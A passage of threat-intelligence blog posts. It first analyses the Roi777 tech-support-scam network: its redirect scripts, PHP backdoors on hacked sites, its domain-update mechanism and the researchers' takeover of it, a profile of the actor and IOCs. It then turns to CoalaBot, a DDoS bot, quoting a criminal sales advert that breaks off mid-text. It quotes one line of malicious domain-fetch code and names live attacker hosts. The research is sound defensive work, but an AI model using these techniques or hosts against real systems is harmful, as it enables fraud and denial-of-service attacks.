we can analyse the code: The script will verify If the navigator of the user is either Chrome or Firefox. In this scenario, the user is redirected to an URL serving a payload. If the browser is Internet Explorer, the user will be redirected to the following URL: hxxp://div-class-container.ru/index5.php, which will in turn redirect the user with an HTTP 301 to the TSS page with the parameter “/index/?801492446045”: In all cases, if the domain name of the actual infected website contains “edu”, “gov” or “mil”, the script will not redirect the user. The IP address where this redirecting script is hosted (193.201.227.193) has been linked to unwanted redirects in late 2017. Doorways redirections What is a Doorway? A doorway script is usually an obfuscated PHP script that can trick search engines crawler to perform black hat SEO by modifying the content of a website to specific combination of keywords. However, the one used in this campaign is pretty advanced and allows the owner to basically do whatever he wants with the infected websites, such as injecting content. We discovered that he will often ‘upgrade’ those doorway scripts to PHP backdoors. We also saw other prolific campaigns for which we don’t have the redirections scripts. For instance, the one generating the largest amount of traffic (URLs are recognizable with “/index/?1051496225880”) has been responsible for 43503 redirections over the 8 hours period (5437 redirections per hour) and represents 40% of the overwall traffic seen: The websites who redirected users for this largest campaign is mostly archive-s54.info with 18331 redirects, followed by: sharesix.com (947 redirections) www.gowatchfreemovies.to (919 redirections) myilifestyle.com (871 redirections) www.primewire.ag (862 redirections) Sharerepo.com (856 redirections) www.fertilitychef.com (820 redirections) Filenuke.com (800 redirections) We believe that those website have the doorways backdoor installed. Most of them are configured to get to latest TSS URL to : hxxp://fped8.org/doorways/settings_v2.php?clientid=<ID>&ineednewurltoredirect=yes This website will return the appropriate domain to redirect the user: Other redirections By monitoring the backend servers, we discovered that the same infrastructure also serves for other malicious activities. Chrome plugin We’ve also observed some redirections chains from malvertising leading to fake chrome extensions. For example, one customer of PopAds, whose account is now banned, was redirecting clients to a TDS system at this URL: hxxp://162.244.35.210/newantikas/?cP65FB. After multiple redirections, the users landed on the website livelifeo.top, which resolved to IPs belonging to the back-end server we were monitoring: After more digging into domains associated to the same scam, we also found another version of the landing page that tried to trick users to those malicious Chrome extensions: The back-end server, owned by Roi777 was also responsible for the traffic generated by those malicious Chrome extensions. We also found a control panel that allowed them to categorize the status of those applications. Fortunately for us, the developer had no idea how to properly protect this panel. The password verification function was implemented in client-side Javascript. We later found those Chrome extension in the Chrome Store infected and heavily obfuscated. The purpose of them was to randomly redirect the user while browsing. The page where users get redirected can vary from nuisance advertisement to fake software installation page and TSS. Anyhow, those addons are no longer being pushed and the page is no longer being updated. The actors probably moved to something else. Pinterest We also found some links to TSS on Pinterest: jeanclementcom.us has been registered with the email address opel73rus@gmail.com, like many other domains name hosted on Roi777 infrastructure. Android applications Malicious APKs are also found to be served when browsing to a domain hosted on his infrastructure : fped8.org/mob/antivirus/1/en/index.php The payload is then downloaded from: fped8.org/mob/antivirus/1/en/downloader.php. Once installed, the application will contact another domain hosted on the same server (hxxp://alija.xyz/panel/). This APK has the ability to redirect users to fraudulent ads and potentially TSS. Analysis of the backend traffic By monitoring differents TDS and back-end server serving those TSS campaigns, we saw a lot of different traffic type linked to differents malicious activities.Not only is this actor involved in the selling of fake software and redirecting to scams, but also in severals webshells and doorways backdoors, allowing him to control a vast network of compromised websites. This section take a look at those differents access methods and how they are leveraged. Uses of scams domains We observed TSS domains usually having the TLD .TK changing more than 100 times per day for this campaign. In the last 30 days only, we were able to log 2912 of those domains. Here is the most common IPs where they are pointing: 999 of them (35%) are resolving to 204.155.28.5 (King Servers) 878 of them (30%) are resolving to 185.159.83.47 (King Servers) 162 of them (5%) are resolving to 54.36.151.52 (OVH) PHP Backdoor We discovered that many “bots” were reporting to the back-end server belonging to Roi777. In fact we account for a total of 1562 infected websites reporting to his server. There are two types of backdoors that report to the infrastructure we monitored. The first one being Doorways.We counted 386 differents website constantly asking the server for content to inject. For the other type of backdoor, we observed 1176 differents domains infected reporting to the server, also asking for content to inject. Here is some stats about the CMS they used: WordPress : 211 OpenCart: 41 Joomla: 19 Magento: 1 Unknown: 904 This backdoor is described in the next section. Doorways to PHP backdoor The Doorways have the capability to fetch for instruction and code to execute. We noticed that many of them were querying fped8.org/doorways/settings_v2.php. This URL, when queried with the good parameters, returns code to execute. This allowed us to saw how they can deploy PHP shell through their Doorways: The content returned contains the backdoor encoded in base64, rot13 and base64 again. After de-obfuscation, we got this code: The first part of this malicious PHP script will query hxxp://kost8med.org/get.php with the user-agent of the current visitor requesting the page and it’s IP address. If a content is returned, it will be outputted in the content of the page. That said, the owner of the backdoor can inject any code they want into the page. Again, kost8med.org is resolving to 162.244.35.30 which is an IP address belonging to Roi777. The second part of the script contains a backdoor function executing every request received in the “c” field of the POST parameter of the request if the parameter “p” is also set with the correct password. The password validation is done in a strange way. The received parameter “p” will be hashed twice before being compared to the hardcoded MD5 hash. However both the idea and the implementation is deficient here, because hashing twice is not more secure in this situation and the comparison is done with “==” instead of “===” (strict comparison), plus the fact that MD5 is no longer considered secure. It took less than 30 mins to crack the actual password allowing the control of those backdoors. We must say that the speciality of those guys is clearly not security, but rather the opposite. On a Wordpress installation, this backdoor is usually found in those files: wp-config.php index.php wp-blog-header.php Footer.php We also found what looks like the administrator panel on the same server that they are reporting to: Other backdoors Many of the websites that were infected by the original backdoor we were investigating on were also infected with other PHP malicious scripts. However, we don’t think those other scripts were linked to this campaign. Infection vector (plugin that is hacked, infected path) It is hard to know for sure how those CMS has been infected. One thing we did notice on lot of them is that the malicious code was in the file footer.php of a WordPress plugins named Genesis. It turns out that this plugin was known to be vulnerable against Arbitrary File Upload in late 2016. However a lot of them have been exploited by other means, such as with other vulnerable plugins and passwords stealings / brute forcing. Redirecting the traffic flow (or dethroning the king) By looking at requests sent to the back-end servers, we noticed curious GET requests among a the traffic. The GET requests in question were formatted like the following : hxxps://wowbelieves.us/tech_supportv2.php?update_domain=<Tech support Scam domain> The update_domain parameter immediately drew our attention, so we tried to do a query to the same PHP file with a domain under our control as the value of this parameter. Immediately, our server started receiving traffic. So apparently, calls to this PHP file change to current domain published for TSS that the backdoors are relying on to redirect the users. In fact, we were able to change the domain returned by roi777.com/domain.php, where multiple backdoors are fetching the current TSS domain. As said before, those domains are changing more than 100 times a day, and we observed that they have a script calling /tech_supportv2.php frequently so users can be redirected to the latest domain. That said, when we changed the TSS domain to point to a domain under our control, it took only few minutes before their script updated it with the real TSS, overwriting ours at the same time. To keep the traffic going to our server, we then had to query multiple time per minute this webpage, and it sure worked. After the initial 8 hours in which we had control of most of the traffic, they updated tech_supportv2.php and their script calling it so that the parameters expect were now the domain name to update, plus a key: hxxps://wowbelieves.us/tech_supportv2.php?update_domain=<Tech support Scam domain>&key=<Hash MD5> To fix the aberrant lack of security in their mechanism to update the current TSS domains, they added this key to the parameters so our previous requests weren’t working anymore. What is this ‘key’ parameter ? The key parameter was 32 characters long, so we immediately thought of an MD5 hash. We tried to hash the current domain to see if it was matching, but no luck. We also noticed that the ‘key’ value (or hash) was different for each TSS domain they were updating and we were able replay them without problem. Given this information, it looked like it they were probably using some sort of salting with the domain name before hashing it. Knowing a part of the hashed value (the domain name), and giving their expertise in cryptography, we started a mask attack locally with hashcat. It took us less than 10 seconds to reveal the salt used. The MD5 hash was the result of the domain name concatenated to the string: “ropl”. This allowed us to take the control back (on and off) of the traffic for another 7 hours. However, the stats used above for webshells and redirections are only based on the first 8 hours of collection. Note that we didn’t take advantage of the redirected traffic, we instead logged every request made and temporarily neutralized the campaigns by avoiding any redirections to malicious websites. The first time we redirected the traffic, we collected more than 108700 requests (8 hours period). The second attempt to redirect the traffic allowed us to log more than 55000 requests (6 hours). By combining both data sets, we did some statistics: Every request made by IP 89.108.105.13 (Russia) was excluded from the graph because it generated by itself 48256 requests to /index/api.php and we believe that this traffic is generated by one of their server that control doorways on their infrastructure. Here are the top 15 most seen websites in the referer field (probably infected websites): Here are the most seen user-agents in those requests: It’s interesting to note that a lot of requests were coming from Kodi (Open Source Home Theater Software), followed by Internet Explorer browser. Link to Roi777 Considering the variety of coding styles, providers, IPs used and infected websites, we believe that many actors are involved in the traffic redirection. However, it is clear that the one known as roi777 has a central role in this whole scheme. As advertised on his website, he’s buying any type of traffic after all. How does all of that links to Roi777 ? Redirections chains explained above will not always redirect users to TSS. In fact, they are often filtering clients base on GeoIP and user-agent. When the traffic is unwanted for TSS, the redirection chain will often lead to : hxxp://balans.shahterworld.org. The parameters passed to those requests is another indication that this campaign is lead by roi777: hxxp://balans.shahterworld.org/?utm_medium=4c23b9fecf7dfd895dfe0da99e857f3bee8e9d42&utm_campaign=roi777_cloack Also, almost all of the redirections scripts are either pointing directly to roi777.com/domain.php to fetch the latest domain or they are reporting to this same backend server, waiting for instruction. We found an interesting discussion that happened on 06-01-2018 on this Russian forum[^1] involving the owner of the company Roi777 (using the nickname bagussusu) and another actor (azuluk) providing him backdoors, doorways and other elements mean to increase the number of redirected users. You can read the translated conversation here. In summary, we can learn that : They were involved in the traffic generated by some Chrome Extension They are using Quiwi / WebMoney financial services to transfer money. Their main offer is currently Tech Support Scam. Bagussusu is accepting a minimum trade of 1000 webshells and can convert them to Doorways Azuluk had 30GB of mail accounts+passwords ready to sell. 5 millions of those were corporate accounts Bagussusu is also using SPAM to increase the traffic. Bagussusu have some employees working for him (developers). The return on investment is apparently better in France (people get scammed easier). Azuluk is using JakoDorgen to create Doorways. Bagussusu recommands to fetch the latest TSS domain to his website with this PHP code: $domain = file_get_contents('http://roi777.com/domain.php'); They also provide other interesting details such as the IP of the TDS Who is this “Roi777” ? Being a young adult living in Russia, you can also find him using the following identities: https://t.me/roi777Eng Tipatop ICQ #: 660-349-155 ICQ #: 380-046-929 Skype: live: compiknews Jabber: BagusSusu@exploit.im Telegram: @roi777Ru compiknews@gmail.com SocMaster This non-exhaustive list is some of the most common pseudonyms he uses online. He operates a company that does “Traffic Monetization”. We now know how this traffic is brought back to his network (by illegals means) and what it is for (fraud). Roi777 Website His official website advertises some Success stories ! Success stories include traffic generated by Doorways And there’s also a Keitaro TDS installed directly on /tds/: IOCs: Most of the domains for domains used for scams are being resolved by ns1.rakamakao.org and ns2.rakamakao.org (195.245.113.186 & 195.245.113.187). The PowerAdmin administration tool they are using is accessible on the same servers: Some of the domains: alija.xyz fped8.org wowbelieves.us shahterworld.org roi777.com kost8med.org picturesun.top websun.top apelsinnik.site chooseok.top anyads.top 49frankov.top africangirlskillingit.top africanprint.top africanpygmyhedgehog.top africanamerican.top arbuz01.org ava4.org jessica1.org crispyom.org kir2great.us selenapix.us wowbirth.us Also, AS14576 Bullet proof hoster: King Servers doesn’t seems to host any legitimate services except of cyber-crime on their infrastructure. IPs: 204.155.28.5 54.36.180.110 54.36.151.52 89.108.105.13 185.159.83.48 185.159.83.47 190.2.132.198 162.244.34.20 162.244.35.21 162.244.35.30 162.244.35.33 162.244.35.35 162.244.35.36 162.244.35.54 162.244.35.55 162.244.35.234 195.245.113.187 195.245.113.186 Conclusion By distributing fake applications, using underground malware distribution campaigns, and leveraging malvertisements, the actors behind the company Roi777 are trying to get as much traffic as they can, by any means possible. They are well active and always willing to get more traffic redirected to their scams so they can increase their income. The EITest campaign, in part responsible for the TSS redirections, is still active even if it is one of the oldest campaign running and the backend servers IP have previous been revealed. [^1]https[://forum.exploit[.in/index.php?act=ST&f=75&t=134802&st=0)CoalaBot: http Ddos Bot2017-10-16T11:01:00+02:002017-10-16T11:01:00+02:00https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div style="margin-left: 1em; margin-right: 1em;"><div style="text-align: center;"><img height="200" src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Coala_Logo.svg/240px-Coala_Logo.svg.png" width="200" /></div></div><br /><div style="margin-left: 1em; margin-right: 1em;"></div>CoalaBot appears to be build on <a href="https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene">August Stealer</a> code (Panel and Traffic are really alike)<br /><br />I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one <a href="https://hilltopads.com/">HilltopAds</a> malvertising. <br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-3_yrJ7OEtcE/WeNFfS22vzI/AAAAAAAAGLU/hsQ18w5GBpo6rc2D8inzvukkbDpdV8I9gCK4BGAYYCw/s1600/2017-10-15_12h23_40.png" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://1.bp.blogspot.com/-3_yrJ7OEtcE/WeNFfS22vzI/AAAAAAAAGLU/hsQ18w5GBpo6rc2D8inzvukkbDpdV8I9gCK4BGAYYCw/s640/2017-10-15_12h23_40.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2017-09-11: a witnessed infection chain to CoalaBot</td></tr></tbody></table><br /><br /><u>A look inside :</u><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-rGoADuYK6TQ/WeM6VqWJcHI/AAAAAAAAGJQ/TdizfK3nOTINjGL8euJM5WCNoGa_tLk_wCK4BGAYYCw/s1600/2017-09-23_03h08_34.png" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://1.bp.blogspot.com/-rGoADuYK6TQ/WeM6VqWJcHI/AAAAAAAAGJQ/TdizfK3nOTINjGL8euJM5WCNoGa_tLk_wCK4BGAYYCw/s640/2017-09-23_03h08_34.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><span style="text-align: start;">CoalaBot: Login Screen</span><br style="text-align: start;" /><span style="text-align: start;">(August Stealer alike) </span></span></td></tr></tbody></table><br /><br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-Dw6qtnxLiEY/WeM6h5X4vXI/AAAAAAAAGJY/Bnzh_rUMSO4RwWMeT49trf-MTc1C0jFOgCK4BGAYYCw/s1600/2017-09-23_03h07_47.png" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://1.bp.blogspot.com/-Dw6qtnxLiEY/WeM6h5X4vXI/AAAAAAAAGJY/Bnzh_rUMSO4RwWMeT49trf-MTc1C0jFOgCK4BGAYYCw/s640/2017-09-23_03h07_47.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: Statistics</td></tr></tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-5T6ltpdwrfk/WeM7clTrcmI/AAAAAAAAGJ0/53wHm0lgCf0ovXRHNiiaEV9dCYYeyxCuwCK4BGAYYCw/s1600/2017-09-23_03h09_02.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="486" src="https://3.bp.blogspot.com/-5T6ltpdwrfk/WeM7clTrcmI/AAAAAAAAGJ0/53wHm0lgCf0ovXRHNiiaEV9dCYYeyxCuwCK4BGAYYCw/s640/2017-09-23_03h09_02.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: Bots</td></tr></tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-wBaOFHariuE/WeM7gNCr8wI/AAAAAAAAGJ8/Q388bhAvBu8nbXYHW_eecF_TLWKrmlw3wCK4BGAYYCw/s1600/2017-09-23_03h09_31.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="180" src="https://1.bp.blogspot.com/-wBaOFHariuE/WeM7gNCr8wI/AAAAAAAAGJ8/Q388bhAvBu8nbXYHW_eecF_TLWKrmlw3wCK4BGAYYCw/s640/2017-09-23_03h09_31.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: Tasks</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-pyZR7pzpf0Q/WeN02KnvnwI/AAAAAAAAGLo/-iPIurzs9LgUDaY7O_aETxJUBb2V-QCqwCK4BGAYYCw/s1600/2017-10-15_15h46_38.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://1.bp.blogspot.com/-pyZR7pzpf0Q/WeN02KnvnwI/AAAAAAAAGLo/-iPIurzs9LgUDaY7O_aETxJUBb2V-QCqwCK4BGAYYCw/s640/2017-10-15_15h46_38.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: Tasks</td></tr></tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-wD8bO_pC3Jc/WeM9Ws1aWEI/AAAAAAAAGK0/Rhb6ODdHxesaB8-Hab3_D78l3YlMxxeZgCK4BGAYYCw/s1600/2017-09-23_09h28_16.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="522" src="https://2.bp.blogspot.com/-wD8bO_pC3Jc/WeM9Ws1aWEI/AAAAAAAAGK0/Rhb6ODdHxesaB8-Hab3_D78l3YlMxxeZgCK4BGAYYCw/s640/2017-09-23_09h28_16.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: New Taks (list)</td></tr></tbody></table><br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-xTessZaHgZE/WeM84gjebxI/AAAAAAAAGKc/QCO-gPZpvAEm0Vg0n-LV_ExsJUFdpiZEwCK4BGAYYCw/s1600/2017-09-23_09h27_20.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="https://2.bp.blogspot.com/-xTessZaHgZE/WeM84gjebxI/AAAAAAAAGKc/QCO-gPZpvAEm0Vg0n-LV_ExsJUFdpiZEwCK4BGAYYCw/s640/2017-09-23_09h27_20.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: https get task details</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-L0n4Il6pZJA/WeM9LUumtgI/AAAAAAAAGKs/JgK1jQOtSjMK8Vx8xcOafY_dKEFYaaaWACK4BGAYYCw/s1600/2017-09-23_09h27_47.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="440" src="https://1.bp.blogspot.com/-L0n4Il6pZJA/WeM9LUumtgI/AAAAAAAAGKs/JgK1jQOtSjMK8Vx8xcOafY_dKEFYaaaWACK4BGAYYCw/s640/2017-09-23_09h27_47.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: http post task details</td></tr></tbody></table><br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-QVjV_clkTYA/WeM7-MbzJ0I/AAAAAAAAGKQ/-NUTPFhcHsgoRwRsabWiU56d2EZ-RFjkACK4BGAYYCw/s1600/2017-09-23_03h10_13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="396" src="https://1.bp.blogspot.com/-QVjV_clkTYA/WeM7-MbzJ0I/AAAAAAAAGKQ/-NUTPFhcHsgoRwRsabWiU56d2EZ-RFjkACK4BGAYYCw/s640/2017-09-23_03h10_13.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CoalaBot: Settings</td></tr></tbody></table>Here is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.<br />(Thanks to Andrew Komarov and others who provided help here).<br />------------------------------------------<br /><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Coala Http Ddos Bot </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Attack types:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• ICMP (PING) FLOOD</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• UDP FLOOD</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• TCP FLOOD</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• HTTP ARME</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• HTTP GET *</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• HTTP POST *</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• HTTP SLOWLORIS *</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• HTTP PULSE WAVE *</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Binary:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• ~100kb after obfuscation</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Auto Backup (optional)</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Low CPU load for efficient use</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Encryption of incoming/outgoing traffic</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Ability to link a build to more than one gate.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Panel:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Detailed statistics on time online/architecture/etc. </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• List of bots, detailed information</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Number count of requests per second (total/for each bot)</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Creation of groups for attacks</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Auto sorting of bots by groups </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Creation of tasks, the ability to choose by group/country</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Setting an optional time for bots success rate </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Other:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Providing macros for randomization of sent data </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Support of .onion gate</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Ability to install an additional layer (BOT => LAYER => MAIN GATE) </div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Requirements:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• PHP 5.6 or higher</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• MySQL</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Screenshots:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Statistics- <a href="http://i.imgur.com/FUevsaS.jpg">http://i.imgur.com/FUevsaS.jpg</a></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Bots - <a href="http://i.imgur.com/nDwl9pY.jpg">http://i.imgur.com/nDwl9pY.jpg</a></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Created tasks - <a href="http://i.imgur.com/RltiDhl.png">http://i.imgur.com/RltiDhl.png</a></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Task List - <a href="http://i.imgur.com/tqEEpX0.jpg">http://i.imgur.com/tqEEpX0.jpg</a></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• Settings - <a href="http://i.imgur.com/EbhExjE.jpg">http://i.imgur.com/EbhExjE.jpg</a></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Price:</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;"><br /></div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• $300 - build and panel. Up to 3 gates for one build.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">• $20 - rebuild</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">The price can vary depending on updates.</div><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Escrow service is welcome.</div><br /><div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">Help with installation is no charge.</div>------------------------------------------<br /><br /><u>Sample:</u><br /><u><br /></u><a href="https://www.virustotal.com/en/file/fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f/analysis/">VT link</a><br />MD5<span style="white-space: pre;"> </span>f3862c311c67cb027a06d4272b680a3b<br />SHA1<span style="white-space: pre;"> </span>0ff1584eec4fc5c72439d94e8cee922703c44049<br />SHA256<span style="white-space: pre;"> </span>fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f<br /><br /><u>Emerging Threats rules :</u><br />2024531<span style="white-space: pre;"> </span>|| ET TROJAN MSIL/CoalaBot CnC Activity<br /><br /><b><u>Read More:</u></b><br /><a href="https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene">August in November: New Information Stealer Hits the Scene</a> - 2016-12-07 - Proofpoint<br /><br />Kafeinehttps://twitter.com/kafeineCoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising. 2017-09-11: a witnessed infection chain to CoalaBotA look inside :CoalaBot: Login Screen(August Stealer alike) CoalaBot: StatisticsCoalaBot: BotsCoalaBot: TasksCoalaBot: TasksCoalaBot: New Taks (list)CoalaBot: https get task detailsCoalaBot: http post task detailsCoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.(Thanks to Andrew Komarov and others who provided help here).------------------------------------------Coala Http Ddos Bot The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE ** - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate Other:• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE) Requirements:• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensionsScreenshots:• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpgPrice:• $300 - build and 